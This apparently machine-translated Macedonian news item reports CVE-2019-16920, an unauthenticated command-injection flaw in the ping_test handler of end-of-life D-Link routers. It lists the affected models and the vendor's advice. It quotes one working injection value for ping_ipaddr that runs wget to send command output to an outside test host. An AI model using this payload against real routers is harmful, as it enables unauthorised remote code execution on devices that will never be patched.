Ранливост што може да се искористи од далечина во рутерите на D-Link

Во безжичните рутери D-Link идентификувани опасна ранливост (CVE-2019-16920), што ви овозможува далечински да извршите код на страната на уредот со испраќање специјално барање до управувачот „ping_test“, достапно без автентикација.

Интересно, според програмерите на фирмверот, повикот „ping_test“ треба да се изврши само по автентикација, но во реалноста се повикува во секој случај, без оглед на најавувањето на веб-интерфејсот. Конкретно, кога се пристапува до скриптата apply_sec.cgi и поминување на параметарот „action=ping_test“, скриптата се пренасочува на страницата за автентикација, но во исто време го извршува дејството поврзано со ping_test. За извршување на кодот, беше искористена друга ранливост во самиот ping_test, кој ја повикува алатката за пинг без правилно да ја провери исправноста на IP адресата испратена на тестирање. На пример, за да ја повикате алатката wget и да ги пренесете резултатите од командата „echo 1234“ на надворешен домаќин, само наведете го параметарот „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( ехо 1234)“.

Ранливост што може да се искористи од далечина во рутерите на D-Link

Присуството на ранливоста е официјално потврдено во следните модели:

  • DIR-655 со фирмвер 3.02b05 или постар;
  • DIR-866L со фирмвер 1.03b04 или постар;
  • DIR-1565 со фирмвер 1.01 или постар;
  • DIR-652 (не се обезбедени податоци за проблематичните верзии на фирмверот)

Периодот за поддршка на овие модели веќе е истечен, па затоа D-Link изјави, кој нема да објавува ажурирања за нив за да ја елиминира ранливоста, не препорачува нивно користење и советува да ги замените со нови уреди. Како безбедносно решение, можете да го ограничите пристапот до веб-интерфејсот само на доверливи IP-адреси.

Подоцна беше откриено дека и ранливоста била влијае моделите DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 и DIR-825, планови за објавување ажурирања за кои сè уште не се познати.

Извор: opennet.ru

Додадете коментар